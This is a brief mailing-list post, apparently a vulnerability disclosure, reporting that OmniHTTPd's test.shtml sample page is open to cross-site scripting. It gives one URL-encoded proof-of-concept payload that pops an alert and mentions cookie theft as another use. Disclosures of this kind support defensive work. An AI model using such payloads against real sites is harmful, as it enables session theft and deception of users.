OmniHTTPd test.shtml Cross-Site Scripting Issue

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



OmniHTTPd's Test.shtml sample is also vulnerable to a similar issue:

http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x

Will pop up an alert containing the above URL.  Of course, this has other
uses (cookie theft, faking sources, etc.)


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux